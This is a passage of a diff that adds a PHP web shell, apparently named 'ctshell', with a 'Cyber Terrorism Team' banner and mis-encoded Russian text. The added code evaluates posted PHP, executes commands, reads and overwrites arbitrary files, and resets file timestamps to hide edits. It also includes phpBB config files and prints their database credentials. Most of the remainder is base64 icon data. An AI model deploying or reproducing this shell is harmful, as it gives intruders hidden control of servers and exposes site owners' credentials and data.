$tmp; +if ($eval_txt) +{ + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; +} 
+else {echo $ret;} + } + else + { +if ($eval_txt) +{ + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; +} +else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>PHP-êîن âûïîëيهيèے</b>"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"آûïîëيèٍü\"></form>"; +} +if ($act == "f") +{ + $r = @file_get_contents($d.$f); + if (!is_readable($d.$f) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";} + else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$sul."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";} + } + else + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) + { +if (in_array($ext,$v)) {$rft = $k; break;} + } + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + + echo "<b>ذàٌٌىîًٍهيèه ôàéëà:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$sul."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." 
(".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + if (is_writable($d.$f)) {echo "<font color=\"green\">دîëيûé نîٌٍَï ÷ٍهيèے/çàïèٌè (".view_perms(fileperms($d.$f)).")</font>";} + else {echo "<font color=\"red\">Read-Only (".view_perms(fileperms($d.$f)).")</font>";} + + echo "<hr size=\"1\" noshade>"; + if ($ft == "info") + { +echo "<b>Information:</b>"; +echo "<table class=tab border=0 cellspacing=1 cellpadding=2>"; +echo "<tr class=tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr>"; +echo "<tr class=tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>"; +if (!$win) +{ + echo "<tr class=tr><td><b>Owner/Group</b></td><td> "; + $tmp=posix_getpwuid(fileowner($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." "; + else echo $tmp['name']." "; + $tmp=posix_getgrgid(filegroup($d.$f)); + if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f); + else echo $tmp['name']; +} +echo "<tr class=tr><td><b>Perms</b></td><td>"; + +if (is_writable($d.$f)) +{ + echo "<font color=\"green\">".view_perms(fileperms($d.$f))."</font>"; +} +else +{ + echo "<font>".view_perms(fileperms($d.$f))."</font>"; +} + +echo "</td></tr>"; +echo "<tr class=tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>"; +echo "<tr class=tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>"; +echo "<tr class=tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>"; +echo "</table><br>"; + + +$fi = fopen($d.$f,"rb"); +if ($fi) +{ + if ($fullhexdump) + { + echo "<b>FULL HEXDUMP</b>"; + $str=fread($fi,filesize($d.$f)); + } + else + { + echo "<b>HEXDUMP PREVIEW</b>"; + $str=fread($fi,$hexdump_lines*$hexdump_rows); + } + $n=0; + $a0="00000000<br>"; + $a1=""; + $a2=""; + for ($i=0; $i<strlen($str); $i++) + { + $a1.=sprintf("%02X",ord($str[$i])).' 
'; + switch (ord($str[$i])) + { +case 0: $a2.="<font class=s2>0</font>"; break; +case 32: +case 10: +case 13: $a2.="&nbsp;"; break; +default: $a2.=htmlspecialchars($str[$i]); + } + $n++; + if ($n == $hexdump_rows) + { +$n = 0; +if ($i+1<strlen($str)) {$a0.=sprintf("%08X",$i+1)."<br>";} +$a1.="<br>"; +$a2.="<br>"; + } + } + echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4 ". +"class=sy><tr><td bgcolor=#666666> $a0</td><td bgcolor=000000>". +"$a1</td><td bgcolor=000000>$a2</td></tr></table><br>"; +} +$encoded = ""; +if ($base64 == 1) +{ + echo "<b>Base64 Encode</b><br>"; + $encoded = base64_encode($r); +} +elseif($base64 == 2) +{ + echo "<b>Base64 Encode + Chunk</b><br>"; + $encoded = chunk_split(base64_encode($r)); +} +elseif($base64 == 3) +{ + echo "<b>Base64 Encode + Chunk + Quotes</b><br>"; + $encoded = base64_encode($r); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); +} +elseif($base64 == 4) +{ +} +if (!empty($encoded)) +{ + echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>"; +} +echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr> +<nobr>[<a href=\"".$sul."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr> +<P>"; + } + elseif ($ft == "html") + { +if ($white) {@ob_clean();} +echo $r; +if ($white) {exit;} + } + elseif ($ft == "txt") + { +echo "<pre>".htmlspecialchars($r)."</pre>"; + } + elseif ($ft == "ini") + { +echo 
"<pre>"; +var_dump(parse_ini_file($d.$f,true)); +echo "</pre>"; + } + elseif ($ft == "phpsess") + { +echo "<pre>"; +$v = explode("|",$r); +echo $v[0]."<br>"; +var_dump(unserialize($v[1])); +echo "</pre>"; + } + elseif ($ft == "exe") + { +echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"".htmlspecialchars($r)."\"><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;<input type=\"submit\" value=\"View&Edit command\"></form>"; + } + elseif ($ft == "sdb") + { +echo "<pre>"; +var_dump(unserialize(base64_decode($r))); +echo "</pre>"; + } + elseif ($ft == "code") + { +if (ereg("phpBB 2.(.*) auto-generated config file",$r)) +{ + $arr = explode(" +",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "<b>phpBB configuration is detected in this file!<br>"; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "<a href=\"".$sul."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."\"><b><u>Connect to DB</u></b></a><br><br>";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ctshell";} + echo "Parameters for manual connect:<br>"; + $cfgvars = array( + "dbms"=>$dbms, + "dbhost"=>$dbhost, + "dbname"=>$dbname, + "dbuser"=>$dbuser, + "dbpasswd"=>$dbpasswd + ); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";} + + echo "</b>"; + echo "<hr size=\"1\" noshade>"; + } +} +echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: #808080;\">"; +if (!empty($white)) {@ob_clean();} +if ($rehtml) {$r = rehtmlspecialchars($r);} +$r = stripslashes($r); +$strip = false; +if(!strpos($r,"<?") && substr($r,0,2)!="<?") {$r="<?php\n".trim($r)."\n?>"; $r = trim($r); $strip = true;} +$r = @highlight_string($r, TRUE); +if ($delspace) {$buffer 
= str_replace ("&nbsp;", " ", $r);} +echo $r; +if (!empty($white)) {exit;} +echo "</div>"; + } + elseif ($ft == "download") + { +@ob_clean(); +header("Content-type: ctshell"); +header("Content-disposition: attachment; filename=\"".$f."\";"); +echo($r); +exit; + } + elseif ($ft == "notepad") + { +@ob_clean(); +header("Content-type: text/plain"); +header("Content-disposition: attachment; filename=\"".$f.".txt\";"); +echo($r); +exit; + } + elseif ($ft == "img") + { +if (!$white) +{ + echo "<center><img src=\"".$sul."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" border=\"1\"></center>"; +} +else +{ + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: image/gif"); + echo($r); + exit; +} + } + elseif ($ft == "edit") + { +if (!empty($submit)) +{ + if ($filestealth) {$stat = stat($d.$f);} + if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "<b>Can't write to file!</b>";} + else + { + echo "<b>رîًُàي¸يü!!!</b>"; + fwrite($fp,$nfcontent); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $nfcontent; + } +} +$rows = count(explode(" +",$r)); +if ($rows < 10) {$rows = 10;} +if ($rows > 30) {$rows = 30;} +echo "<form method=\"POST\"><input type=\"submit\" name=\"submit\" value=\"رîًُàيèٍü\">&nbsp;<input type=\"reset\" value=\"رلًîٌ\">&nbsp;<br><textarea name=\"nfcontent\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>"; + } + elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. 
If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";} + else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";} + } +} +if ($act == "phpinfo") +{ + ob_end_clean(); + phpinfo(); + exit; +} +} +$data = base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9IzAwZmYwMD5DeWJlciBUZXJyb3Jpc20gVGVhbTwvZm9udD48YnI+PGZvbnQgc2l6ZT0yPg0KyOTl/ywg6Ofs5e3l7ej/IOTo5+Dp7eAg6CDx6vDo7/LgIOTu4eDi6Os6PC9mb250PjxpbWcgc3JjPWh0dHA6Ly9vbmxpbmUubWlyYWJpbGlzLmNvbS9zY3JpcHRzL29ubGluZS5kbGw/aWNxPTMzNTk3NjAyMSZpbWc9NSBoZWlnaHQ9MTggd2lkdGg9MTg+PGZvbnQgc2l6ZT0yIGNvbG9yPSNGRkRFMDA+IFJPRE5PQzwvZm9udD48L2NlbnRlcj4="); +if ($act == "img") +{ + @ob_clean(); + + $arrimg = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". 
+"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhEQAPAKIAAO/v8N3e387OzpSt72NzrVFZfCkxUv///yH5BAUUAAcALAAAAAARAA8AAANSe". +"Grc3uoYAEq4wWZqFtWXVnBehWUhKQ1V4b6uagwsZd/ATO84ru+0k/C3MxCOSIyDZhQ4nYRnZ2UQRJ9". +"W6aKaxV4F02r1CwWDF2bYyzyVPN6dBAA7", +"edit"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". 
+"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhDgAQALMPAKt5E8uYM7SBHLyJJMaTLsGOKaRyDJ5sBv/MZ//////ge//rhf/Ub//3kf//m". +"f///yH5BAEAAA8ALAAAAAAOABAAAARF8MlJq704axo6yUEiJsUVOqiTDIPgSkEjz6MIPMGi7/xyE4q". +"gcKj4MY7IJONWQDifUAQzSr0NqFErFnp7uASAsMFwKD8iADs=", +"small_unk"=> +"R0lGODlhEQAUANUhAOXl1c3MzJiYmCkufnoRE83MzTNOoszLzO4jI/HqQIeGh5iYlxZ7PRh8PXLM". +"2FRVVMvLyzRNofbHPnsRE+bm1QgJCebl1FRUVFVVVIaGh1VVVQcICCoufoaFhYWGhszMzP///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAACEALAAAAAARABQAAAaewJBw". +"SCwaj0hPZpnxOD2dhdFDsVgBV4tAU+yAvmCwAHQhesNhwQVTFnoVS2gn0/FsIJiht8ORcP4DfxVk". +"QxkgfIF/gBuEQh6HaF8WjHmOIIYJBF8GIBSUQ49eBAggBg4RniBclo8gE18MDQCDqyGhAFUUuLi0". 
+"oCAbFRvAwcCMtWeRYW0hGQcfAc/QBQEFzpUhbBoaGNsP2mtrSOLjSEEAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". 
+"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". 
+"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_ani"=> +"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAgwAAAP/////MmczMmf/MzJmZZszMzP//zAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARbEMmJAKC4XhCKvRhABJZgACY4oSR3HmdFcQLndaVK7ziu". +"VQRBYBAI1IKWYrLIJBhwrBqzOHKCotMRcaCbBrRDz+pLHQ65IWOZKE4Lz+hM5SAcDNoZwOBAINxV". +"EQA7", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_au"=> 